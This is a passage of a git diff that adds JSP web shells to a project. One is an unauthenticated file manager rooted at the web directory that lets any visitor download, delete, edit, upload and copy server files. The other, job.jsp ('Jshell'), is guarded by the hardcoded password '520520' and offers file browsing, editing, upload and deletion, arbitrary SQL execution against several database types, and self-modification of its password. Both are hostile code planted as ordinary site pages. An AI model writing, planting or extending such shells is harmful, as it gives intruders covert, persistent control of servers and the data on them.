+ }
+ else return time<10 ? "0" + time + "s": time + "s";
+ }
+
+ public String getTimeEstimated() {
+ if (currSize == 0) return "n/a";
+ long time = System.currentTimeMillis() - starttime;
+ time = totalSize * time / currSize;
+ time /= 1000l;
+ if (time - 60l >= 0){
+ if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+ else return time / 60 + ":0" + (time % 60) + "m";
+ }
+ else return time<10 ? "0" + time + "s": time + "s";
+ }
+
+ }
+
+ public class FileInfo {
+
+ public String name = null, clientFileName = null, fileContentType = null;
+ private byte[] fileContents = null;
+ public File file = null;
+ public StringBuffer sb = new StringBuffer(100);
+
+ public void setFileContents(byte[] aByteArray) {
+ fileContents = new byte[aByteArray.length];
+ System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+ }
+}
+
+// A Class with methods used to process a ServletInputStream
+public class HttpMultiPartParser {
+
+ private final String lineSeparator = System.getProperty("line.separator", "\n");
+ private final int ONE_MB = 1024 * 1;
+
+ public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+ int clength) throws IllegalArgumentException, IOException {
+ if (is == null) throw new IllegalArgumentException("InputStream");
+ if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+ "\"" + boundary + "\" is an illegal boundary indicator");
+ boundary = "--" + boundary;
+ StringTokenizer stLine = null, stFields = null;
+ FileInfo fileInfo = null;
+ Hashtable dataTable = new Hashtable(5);
+ String line = null, field = null, paramName = null;
+ boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+ boolean isFile = false;
+ if (saveFiles) { // Create the required directory (including parent dirs)
+ File f = new File(saveInDir);
+ f.mkdirs();
+ }
+ line = getLine(is);
+ if (line == null || !line.startsWith(boundary)) throw new IOException(
+ "Boundary not found; boundary = " + boundary + ", line = " + line);
+ while (line != null) {
+ if (line == null || !line.startsWith(boundary)) return dataTable;
+ line = getLine(is);
+ if (line == null) return dataTable;
+ stLine = new StringTokenizer(line, ";\r\n");
+ if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in second line");
+ line = stLine.nextToken().toLowerCase();
+ if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+ "Bad data in second line");
+ stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+ if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in second line");
+ fileInfo = new FileInfo();
+ stFields.nextToken();
+ paramName = stFields.nextToken();
+ isFile = false;
+ if (stLine.hasMoreTokens()) {
+ field = stLine.nextToken();
+ stFields = new StringTokenizer(field, "=\"");
+ if (stFields.countTokens() > 1) {
+ if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+ fileInfo.name = paramName;
+ String value = stFields.nextToken();
+ if (value != null && value.trim().length() > 0) {
+ fileInfo.clientFileName = value;
+ isFile = true;
+ }
+ else {
+ line = getLine(is); // Skip "Content-Type:" line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Position to boundary line
+ continue;
+ }
+ }
+ }
+ else if (field.toLowerCase().indexOf("filename") >= 0) {
+ line = getLine(is); // Skip "Content-Type:" line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Position to boundary line
+ continue;
+ }
+ }
+ boolean skipBlankLine = true;
+ if (isFile) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ if (line.trim().length() < 1) skipBlankLine = false;
+ else {
+ stLine = new StringTokenizer(line, ": ");
+ if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in third line");
+ stLine.nextToken(); // Content-Type
+ fileInfo.fileContentType = stLine.nextToken();
+ }
+ }
+ if (skipBlankLine) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ }
+ if (!isFile) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ dataTable.put(paramName, line);
+ // If parameter is dir, change saveInDir to dir
+ if (paramName.equals("dir")) saveInDir = line;
+ line = getLine(is);
+ continue;
+ }
+ try {
+ UplInfo uplInfo = new UplInfo(clength);
+ UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+ OutputStream os = null;
+ String path = null;
+ if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+ fileInfo.clientFileName));
+ else os = new ByteArrayOutputStream(ONE_MB);
+ boolean readingContent = true;
+ byte previousLine[] = new byte[2 * ONE_MB];
+ byte temp[] = null;
+ byte currentLine[] = new byte[2 * ONE_MB];
+ int read, read3;
+ if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+ line = null;
+ break;
+ }
+ while (readingContent) {
+ if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+ line = null;
+ uplInfo.aborted = true;
+ break;
+ }
+ if (compareBoundary(boundary, currentLine)) {
+ os.write(previousLine, 0, read - 2);
+ line = new String(currentLine, 0, read3);
+ break;
+ }
+ else {
+ os.write(previousLine, 0, read);
+ uplInfo.currSize += read;
+ temp = currentLine;
+ currentLine = previousLine;
+ previousLine = temp;
+ read = read3;
+ }//end else
+ }//end while
+ os.flush();
+ os.close();
+ if (!saveFiles) {
+ ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+ fileInfo.setFileContents(baos.toByteArray());
+ }
+ else fileInfo.file = new File(path);
+ dataTable.put(paramName, fileInfo);
+ uplInfo.currSize = uplInfo.totalSize;
+ }//end try
+ catch (IOException e) {
+ throw e;
+ }
+ }
+ return dataTable;
+ }
+
+ /**
+ * Compares boundary string to byte array
+ */
+ private boolean compareBoundary(String boundary, byte ba[]) {
+ byte b;
+ if (boundary == null || ba == null) return false;
+ for (int i = 0; i < boundary.length(); i++)
+ if ((byte) boundary.charAt(i) != ba[i]) return false;
+ return true;
+ }
+
+ /** Convenience method to read HTTP header lines */
+ private synchronized String getLine(ServletInputStream sis) throws IOException {
+ byte b[] = new byte[1024];
+ int read = sis.readLine(b, 0, b.length), index;
+ String line = null;
+ if (read != -1) {
+ line = new String(b, 0, read);
+ if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+ }
+ return line;
+ }
+
+ public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+ String path = null;
+ if (dir == null || fileName == null) throw new IllegalArgumentException(
+ "dir or fileName is null");
+ int index = fileName.lastIndexOf('/');
+ String name = null;
+ if (index >= 0) name = fileName.substring(index + 1);
+ else name = fileName;
+ index = name.lastIndexOf('\\');
+ if (index >= 0) fileName = name.substring(index + 1);
+ path = dir + File.separator + fileName;
+ if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+ else return path.replace('/', File.separatorChar);
+ }
+} //End of class HttpMultiPartParser
+
+String formatPath(String p)
+{
+ StringBuffer sb=new StringBuffer();
+ for (int i = 0; i < p.length(); i++)
+ {
+ if(p.charAt(i)=='\\')
+ {
+ sb.append("\\\\");
+ }
+ else
+ {
+ sb.append(p.charAt(i));
+ }
+ }
+ return sb.toString();
+}
+
+ /**
+ * Converts some important chars (int) to the corresponding html string
+ */
+ static String conv2Html(int i) {
+ if (i == '&') return "&";
+ else if (i == '<') return "<";
+ else if (i == '>') return ">";
+ else if (i == '"') return """;
+ else return "" + (char) i;
+ }
+
+ /**
+ * Converts a normal string to a html conform string
+ */
+ static String htmlEncode(String st) {
+ StringBuffer buf = new StringBuffer();
+ for (int i = 0; i < st.length(); i++) {
+ buf.append(conv2Html(st.charAt(i)));
+ }
+ return buf.toString();
+ }
+String getDrivers()
+/**
+Windows系统上取得可用的所有逻辑盘
+*/
+{
+ StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
+ File roots[]=File.listRoots();
+ for(int i=0;i");
+ sb.append(roots[i]+" ");
+ }
+ return sb.toString();
+}
+static String convertFileSize(long filesize)
+{
+ //bug 5.09M 显示5.9M
+ String strUnit="Bytes";
+ String strAfterComma="";
+ int intDivisor=1;
+ if(filesize>=1024*1024)
+ {
+ strUnit = "MB";
+ intDivisor=1024*1024;
+ }
+ else if(filesize>=1024)
+ {
+ strUnit = "KB";
+ intDivisor=1024;
+ }
+ if(intDivisor==1) return filesize + " " + strUnit;
+ strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
+ if(strAfterComma=="") strAfterComma=".0";
+ return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
+}
+%>
+<%
+request.setCharacterEncoding("gb2312");
+String tabID = request.getParameter("tabID");
+String strDir = request.getParameter("path");
+String strAction = request.getParameter("action");
+String strFile = request.getParameter("file");
+String strPath = strDir + "\\" + strFile;
+String strCmd = request.getParameter("cmd");
+StringBuffer sbEdit=new StringBuffer("");
+StringBuffer sbDown=new StringBuffer("");
+StringBuffer sbCopy=new StringBuffer("");
+StringBuffer sbSaveCopy=new StringBuffer("");
+StringBuffer sbNewFile=new StringBuffer("");
+
+if((tabID==null) || tabID.equals(""))
+{
+ tabID = "1";
+}
+
+if(strDir==null||strDir.length()<1)
+{
+ strDir = request.getRealPath("/");
+}
+
+
+if(strAction!=null && strAction.equals("down"))
+{
+ File f=new File(strPath);
+ if(f.length()==0)
+ {
+ sbDown.append("文件大小为 0 字节,就不用下了吧");
+ }
+ else
+ {
+ response.setHeader("content-type","text/html; charset=ISO-8859-1");
+ response.setContentType("APPLICATION/OCTET-STREAM");
+ response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
+ FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
+ out.clearBuffer();
+ int i;
+ while ((i=fileInputStream.read()) != -1)
+ {
+ out.write(i);
+ }
+ fileInputStream.close();
+ out.close();
+ }
+}
+
+if(strAction!=null && strAction.equals("del"))
+{
+ File f=new File(strPath);
+ f.delete();
+}
+
+if(strAction!=null && strAction.equals("edit"))
+{
+ File f=new File(strPath);
+ BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
+ sbEdit.append("");
+}
+
+if(strAction!=null && strAction.equals("save"))
+{
+ File f=new File(strPath);
+ BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
+ String strContent=request.getParameter("content");
+ bw.write(strContent);
+ bw.close();
+}
+if(strAction!=null && strAction.equals("copy"))
+{
+ File f=new File(strPath);
+ sbCopy.append("目标文件错误。 ");
+ }
+ else
+ {
+ File f_des=new File(strDesFile);
+ if(f_des.isFile())
+ {
+ sbSaveCopy.append("
目标文件已存在,不能复制。 ");
+ }
+ else
+ {
+ String strTmpFile=strDesFile;
+ if(f_des.isDirectory())
+ {
+ if(!strDesFile.endsWith("\\"))
+ {
+ strDesFile=strDesFile+"\\";
+ }
+ strTmpFile=strDesFile+"cqq_"+strFile;
+ }
+
+ File f_des_copy=new File(strTmpFile);
+ FileInputStream in1=new FileInputStream(f);
+ FileOutputStream out1=new FileOutputStream(f_des_copy);
+ byte[] buffer=new byte[1024];
+ int c;
+ while((c=in1.read(buffer))!=-1)
+ {
+ out1.write(buffer,0,c);
+ }
+ in1.close();
+ out1.close();
+
+ sbSaveCopy.append("原始文件 :"+strPath+"
");
+ sbSaveCopy.append("目标文件 :"+strTmpFile+"
");
+ sbSaveCopy.append("复制成功! ");
+ }
+ }
+ sbSaveCopy.append("
建立文件或目录出错。 ");
+ }
+}
+
+if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
+{
+ String tempdir=".";
+ boolean error=false;
+ response.setContentType("text/html");
+ sbNewFile.append("
建立文件或目录出错。 ");
+ HttpMultiPartParser parser = new HttpMultiPartParser();
+
+ int bstart = request.getContentType().lastIndexOf("oundary=");
+ String bound = request.getContentType().substring(bstart + 8);
+ int clength = request.getContentLength();
+ Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
+ if (ht.get("cqqUploadFile") != null)
+ {
+
+ FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
+ File f1 = fi.file;
+ UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
+ if (info != null && info.aborted)
+ {
+ f1.delete();
+ request.setAttribute("error", "Upload aborted");
+ }
+ else
+ {
+ String path = (String) ht.get("path");
+ if(path!=null && !path.endsWith("\\"))
+ path = path + "\\";
+ if (!f1.renameTo(new File(path + f1.getName())))
+ {
+ request.setAttribute("error", "Cannot upload file.");
+ error = true;
+ f1.delete();
+ }
+ }
+ }
+}
+%>
+
+
+
+
+
+
+
+index
+
+
+
+
+
+
+
+
+
+
+
+
+<%
+StringBuffer sbFolder=new StringBuffer("");
+StringBuffer sbFile=new StringBuffer("");
+try
+{
+ File objFile = new File(strDir);
+ File list[] = objFile.listFiles();
+ if(objFile.getAbsolutePath().length()>3)
+ {
+ sbFolder.append(" ");
+ sbFolder.append(strParentFolder[languageNo]+" ");
+ sbFolder.append(" ");
+ sbFolder.append(list[i].getName()+"
");
+ sbFile.append(""+list[i].getName());
+ sbFile.append(" ");
+ sbFile.append(""+strLen);
+ sbFile.append(" ");
+ sbFile.append(""+strDT);
+ sbFile.append(" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileEdit[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileDel[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileDown[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileCopy[languageNo]+" ");
+ }
+
+ }
+}
+catch(Exception e)
+{
+ out.println("操作失败: "+e.toString()+" ");
+}
+%>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/jsp/job.jsp b/jsp/job.jsp
new file mode 100644
index 0000000..9cad130
--- /dev/null
+++ b/jsp/job.jsp
@@ -0,0 +1,1811 @@
+<%@ page contentType="text/html; charset=GBK" %>
+<%@ page import="java.io.*"%>
+<%@ page import="java.util.Map"%>
+<%@ page import="java.util.HashMap"%>
+<%@ page import="java.nio.charset.Charset"%>
+<%@ page import="java.util.regex.*"%>
+<%@ page import="java.sql.*"%>
+<%!
+private String _password = "520520";
+private String _encodeType = "GB2312";
+private int _sessionOutTime = 20;
+private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"};
+private Connection _dbConnection = null;
+private Statement _dbStatement = null;
+private String _url = null;
+
+public boolean validate(String password) {
+ if (password.equals(_password)) {
+ return true;
+ } else {
+ return false;
+ }
+}
+
+public String HTMLEncode(String str) {
+ str = str.replaceAll(" ", " ");
+ str = str.replaceAll("<", "<");
+ str = str.replaceAll(">", ">");
+ str = str.replaceAll("\r\n", "bad command \"" + cmd + "\" ";
+ } finally {
+ return retStr;
+ }
+}
+
+public String pathConvert(String path) {
+ String sRet = path.replace('\\', '/');
+ File file = new File(path);
+
+ if (file.getParent() != null) {
+ if (file.isDirectory()) {
+ if (! sRet.endsWith("/"))
+ sRet += "/";
+ }
+ } else {
+ if (! sRet.endsWith("/"))
+ sRet += "/";
+ }
+
+ return sRet;
+}
+
+public String strCut(String str, int len) {
+ String sRet;
+
+ len -= 3;
+
+ if (str.getBytes().length <= len) {
+ sRet = str;
+ } else {
+ try {
+ sRet = (new String(str.getBytes(), 0, len, "GBK")) + "...";
+ } catch (Exception e) {
+ sRet = str;
+ }
+ }
+
+ return sRet;
+}
+
+public String listFiles(String path, String curUri) {
+ File[] files = null;
+ File curFile = null;
+ String sRet = null;
+ int n = 0;
+ boolean isRoot = path.equals("");
+
+ path = pathConvert(path);
+
+ try {
+ if (isRoot) {
+ files = File.listRoots();
+ } else {
+ try {
+ curFile = new File(path);
+ String[] sFiles = curFile.list();
+ files = new File[sFiles.length];
+
+ for (n = 0; n < sFiles.length; n ++) {
+ files[n] = new File(path + sFiles[n]);
+ }
+ } catch (Exception e) {
+ sRet = "bad path \"" + path + "\" ";
+ }
+ }
+
+ if (sRet == null) {
+ sRet = "\n";
+ sRet += "\n";
+ sRet += "\n";
+ sRet += " \n";
+
+ sRet += " \n";
+ sRet += "
\n";
+ }
+ } catch (SecurityException e) {
+ sRet = "security violation, no privilege. ";
+ }
+
+ return sRet;
+}
+
+public boolean isTextFile(String extName) {
+ int i;
+ boolean bRet = false;
+
+ if (! extName.equals("")) {
+ for (i = 0; i < _textFileTypes.length; i ++) {
+ if (extName.equals(_textFileTypes[i])) {
+ bRet = true;
+ break;
+ }
+ }
+ } else {
+ bRet = true;
+ }
+
+ return bRet;
+}
+
+public String getExtName(String fileName) {
+ String sRet = "";
+ int nLastDotPos;
+
+ fileName = pathConvert(fileName);
+
+ nLastDotPos = fileName.lastIndexOf(".");
+
+ if (nLastDotPos == -1) {
+ sRet = "";
+ } else {
+ sRet = fileName.substring(nLastDotPos + 1);
+ }
+
+ return sRet;
+}
+
+public String browseFile(String path) {
+ String sRet = "";
+ File file = null;
+ FileReader fileReader = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path);
+ fileReader = new FileReader(file);
+ String fileString = "";
+ char[] chBuffer = new char[1024];
+ int ret;
+
+ sRet = "\n";
+
+ } catch (IOException e) {
+ sRet += "\n";
+ }
+
+ return sRet;
+}
+
+public String openFile(String path, String curUri) {
+ String sRet = "";
+ boolean canOpen = false;
+ int nLastDotPos = path.lastIndexOf(".");
+ String extName = "";
+ String fileString = null;
+ File curFile = null;
+
+ path = pathConvert(path);
+
+ if (nLastDotPos == -1) {
+ canOpen = true;
+ } else {
+ extName = path.substring(nLastDotPos + 1);
+ canOpen = isTextFile(extName);
+ }
+
+ if (canOpen) {
+ try {
+ fileString = "";
+ curFile = new File(path);
+ FileReader fileReader = new FileReader(curFile);
+ char[] chBuffer = new char[1024];
+ int nRet;
+
+ while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
+ fileString += new String(chBuffer, 0, nRet);
+ }
+
+ fileReader.close();
+ } catch (IOException e) {
+ fileString = null;
+ sRet = "不能打开文件\"" + path + "\" ";
+ } catch (SecurityException e) {
+ fileString = null;
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+ } else {
+ sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode ";
+ }
+
+ if (fileString != null) {
+ sRet += "\n";
+ sRet += "\n";
+ sRet += " \n";
+ sRet += "
\n";
+ }
+
+ return sRet;
+}
+
+public String saveFile(String path, String curUri, String fileContent) {
+ String sRet = "";
+ File file = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path);
+
+ if (! file.canWrite()) {
+ sRet = "文件不可写 ";
+ } else {
+ FileWriter fileWriter = new FileWriter(file);
+ fileWriter.write(fileContent);
+
+ fileWriter.close();
+ sRet = "文件保存成功,正在返回,请稍候……\n";
+ sRet += "保存文件失败 ";
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+
+ return sRet;
+}
+
+public String createFolder(String path, String curUri, String folderName) {
+ String sRet = "";
+ File folder = null;
+
+ path = pathConvert(path);
+
+ try {
+ folder = new File(path + folderName);
+
+ if (folder.exists() && folder.isDirectory()) {
+ sRet = "\"" + path + folderName + "\"目录已经存在 ";
+ } else {
+ if (folder.mkdir()) {
+ sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n";
+ sRet += "创建目录\"" + folderName + "\"失败 ";
+ }
+ }
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+
+ return sRet;
+}
+
+public String createFile(String path, String curUri, String fileName) {
+ String sRet = "";
+ File file = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path + fileName);
+
+ if (file.createNewFile()) {
+ sRet = "\"" + path + fileName + "\"文件已经存在 ";
+ }
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ } catch (IOException e) {
+ sRet = "创建文件\"" + path + fileName + "\"失败 ";
+ }
+
+ return sRet;
+}
+
+public String deleteFile(String path, String curUri, String[] files2Delete) {
+ String sRet = "";
+ File tmpFile = null;
+
+ try {
+ for (int i = 0; i < files2Delete.length; i ++) {
+ tmpFile = new File(files2Delete[i]);
+ if (! tmpFile.delete()) {
+ sRet += "删除\"" + files2Delete[i] + "\"失败 安全问题,没有权限执行该操作 \n";
+ }
+
+ return sRet;
+}
+
+public String saveAs(String path, String curUri, String fileContent) {
+ String sRet = "";
+ File file = null;
+ FileWriter fileWriter = null;
+
+ try {
+ file = new File(path);
+
+ if (file.createNewFile()) {
+ fileWriter = new FileWriter(file);
+ fileWriter.write(fileContent);
+ fileWriter.close();
+
+ sRet = "文件\"" + path + "\"已经存在 ";
+ }
+ } catch (IOException e) {
+ sRet = "创建文件\"" + path + "\"失败 ";
+ }
+
+ return sRet;
+}
+
+
+public String uploadFile(ServletRequest request, String path, String curUri) {
+ String sRet = "";
+ File file = null;
+ InputStream in = null;
+
+ path = pathConvert(path);
+
+ try {
+ in = request.getInputStream();
+
+ byte[] inBytes = new byte[request.getContentLength()];
+ int nBytes;
+ int start = 0;
+ int end = 0;
+ int size = 1024;
+ String token = null;
+ String filePath = null;
+
+ //
+ // 把输入流读入一个字节数组
+ //
+ while ((nBytes = in.read(inBytes, start, size)) != -1) {
+ start += nBytes;
+ }
+
+ in.close();
+ //
+ // 从字节数组中得到文件分隔符号
+ //
+ int i = 0;
+ byte[] seperator;
+
+ while (inBytes[i] != 13) {
+ i ++;
+ }
+
+ seperator = new byte[i];
+
+ for (i = 0; i < seperator.length; i ++) {
+ seperator[i] = inBytes[i];
+ }
+
+ //
+ // 得到Header部分
+ //
+ String dataHeader = null;
+ i += 3;
+ start = i;
+ while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) {
+ i ++;
+ }
+ end = i - 1;
+ dataHeader = new String(inBytes, start, end - start + 1);
+
+ //
+ // 得到文件名
+ //
+ token = "filename=\"";
+ start = dataHeader.indexOf(token) + token.length();
+ token = "\"";
+ end = dataHeader.indexOf(token, start) - 1;
+ filePath = dataHeader.substring(start, end + 1);
+ filePath = pathConvert(filePath);
+ String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);
+
+ //
+ // 得到文件内容开始位置
+ //
+ i += 4;
+ start = i;
+
+ /*
+ boolean found = true;
+ byte[] tmp = new byte[seperator.length];
+ while (i <= inBytes.length - 1 - seperator.length) {
+
+ for (int j = i; j < i + seperator.length; j ++) {
+ if (seperator[j - i] != inBytes[j]) {
+ found = false;
+ break;
+ } else
+ tmp[j - i] = inBytes[j];
+ }
+
+ if (found)
+ break;
+
+ i ++;
+ }*/
+
+ //
+ // 偷懒的办法
+ //
+ end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
+
+ //
+ // 保存为文件
+ //
+ File newFile = new File(path + fileName);
+ newFile.createNewFile();
+ FileOutputStream out = new FileOutputStream(newFile);
+
+ //out.write(inBytes, start, end - start + 1);
+ out.write(inBytes, start, end - start + 1);
+ out.close();
+
+ sRet = "\n";
+ } catch (IOException e) {
+ sRet = "\n";
+ }
+
+ sRet += "文件\"" + files2Copy[i] + "\"复制失败 文件\"" + file2Rename + "\"不存在 ";
+ } else {
+ file.renameTo(newFile);
+ sRet = "文件重命名成功,正在返回,请稍候……";
+ sRet += "安全问题导致文件\"" + file2Rename + "\"复制失败 ";
+ }
+
+ return sRet;
+}
+
+public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) {
+ boolean bRet = true;
+ String driverName = "";
+
+ if (dbServer.equals(""))
+ dbServer = "localhost";
+
+ try {
+ if (dbType.equals("sqlserver")) {
+ driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
+ if (dbPort.equals(""))
+ dbPort = "1433";
+ _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
+ } else if (dbType.equals("mysql")) {
+ driverName = "com.mysql.jdbc.Driver";
+ if (dbPort.equals(""))
+ dbPort = "3306";
+ _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
+ } else if (dbType.equals("odbc")) {
+ driverName = "sun.jdbc.odbc.JdbcOdbcDriver";
+ _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword;
+ } else if (dbType.equals("oracle")) {
+ driverName = "oracle.jdbc.driver.OracleDriver";
+ _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName;
+ } else if (dbType.equals("db2")) {
+ driverName = "com.ibm.db2.jdbc.app.DB2Driver";
+ _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName;
+ }
+
+ Class.forName(driverName);
+ } catch (ClassNotFoundException e) {
+ bRet = false;
+ }
+
+ return bRet;
+}
+
+public boolean DBConnect(String User, String Password) {
+ boolean bRet = false;
+
+ if (_url != null) {
+ try {
+ _dbConnection = DriverManager.getConnection(_url, User, Password);
+ _dbStatement = _dbConnection.createStatement();
+ bRet = true;
+ } catch (SQLException e) {
+ bRet = false;
+ }
+ }
+
+ return bRet;
+}
+
+public String DBExecute(String sql) {
+ String sRet = "";
+
+ if (_dbConnection == null || _dbStatement == null) {
+ sRet = "数据库没有正常连接 ";
+ } else {
+ try {
+ if (sql.toLowerCase().substring(0, 6).equals("select")) {
+ ResultSet rs = _dbStatement.executeQuery(sql);
+ ResultSetMetaData rsmd = rs.getMetaData();
+ int colNum = rsmd.getColumnCount();
+ int colType;
+
+ sRet = "sql语句执行成功,返回结果\n";
+ sRet += " \n";
+ for (int i = 1; i <= colNum; i ++) {
+ sRet += " " + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ") \n";
+ }
+ sRet += " \n";
+ while (rs.next()) {
+ sRet += " \n";
+ for (int i = 1; i <= colNum; i ++) {
+ colType = rsmd.getColumnType(i);
+
+ sRet += " ";
+ switch (colType) {
+ case Types.BIGINT:
+ sRet += rs.getLong(i);
+ break;
+
+ case Types.BIT:
+ sRet += rs.getBoolean(i);
+ break;
+
+ case Types.BOOLEAN:
+ sRet += rs.getBoolean(i);
+ break;
+
+ case Types.CHAR:
+ sRet += rs.getString(i);
+ break;
+
+ case Types.DATE:
+ sRet += rs.getDate(i).toString();
+ break;
+
+ case Types.DECIMAL:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.NUMERIC:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.REAL:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.DOUBLE:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.FLOAT:
+ sRet += rs.getFloat(i);
+ break;
+
+ case Types.INTEGER:
+ sRet += rs.getInt(i);
+ break;
+
+ case Types.TINYINT:
+ sRet += rs.getShort(i);
+ break;
+
+ case Types.VARCHAR:
+ sRet += rs.getString(i);
+ break;
+
+ case Types.TIME:
+ sRet += rs.getTime(i).toString();
+ break;
+
+ case Types.DATALINK:
+ sRet += rs.getTimestamp(i).toString();
+ break;
+ }
+ sRet += " \n";
+ }
+ sRet += " \n";
+ }
+ sRet += "
\n";
+
+ rs.close();
+ } else {
+ if (_dbStatement.execute(sql)) {
+ sRet = "sql语句执行成功";
+ } else {
+ sRet = "sql语句执行失败 ";
+ }
+ }
+ } catch (SQLException e) {
+ sRet = "sql语句执行失败 ";
+ }
+ }
+
+ return sRet;
+}
+
+public void DBRelease() {
+ try {
+ if (_dbStatement != null) {
+ _dbStatement.close();
+ _dbStatement = null;
+ }
+
+ if (_dbConnection != null) {
+ _dbConnection.close();
+ _dbConnection = null;
+ }
+ } catch (SQLException e) {
+
+ }
+}
+
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+class JshellConfig {
+ private String _jshellContent = null;
+ private String _path = null;
+
+ public JshellConfig(String path) throws JshellConfigException {
+ _path = path;
+ read();
+ }
+
+ private void read() throws JshellConfigException {
+ try {
+ FileReader jshell = new FileReader(new File(_path));
+ char[] buffer = new char[1024];
+ int nChars;
+ _jshellContent = "";
+
+ while ((nChars = jshell.read(buffer, 0, 1024)) != -1) {
+ _jshellContent += new String(buffer, 0, nChars);
+ }
+
+ jshell.close();
+ } catch (IOException e) {
+ throw new JshellConfigException("打开文件失败");
+ }
+ }
+
+ public void save() throws JshellConfigException {
+ FileWriter jshell = null;
+
+ try {
+ jshell = new FileWriter(new File(_path));
+ char[] buffer = _jshellContent.toCharArray();
+ int start = 0;
+ int size = 1024;
+
+ for (start = 0; start < buffer.length - 1 - size; start += size) {
+ jshell.write(buffer, start, size);
+ }
+
+ jshell.write(buffer, start, buffer.length - 1 - start);
+ } catch (IOException e) {
+ new JshellConfigException("写文件失败");
+ } finally {
+ try {
+ jshell.close();
+ } catch (IOException e) {
+
+ }
+ }
+ }
+
+ public void setPassword(String password) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\w+");
+ Matcher m = p.matcher(password);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("密码不能有除字母数字下划线以外的字符");
+ }
+
+ p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\"");
+ m = p.matcher(_jshellContent);
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private String _password = \"" + password + "\"");
+
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public void setEncodeType(String encodeType) throws JshellConfigException {
+ Pattern p = Pattern.compile("[A-Za-z0-9]+");
+ Matcher m = p.matcher(encodeType);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("编码格式只能是字母和数字的组合");
+ }
+
+ p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\"");
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\"");
+ //return HTMLEncode(_jshellContent);
+ }
+
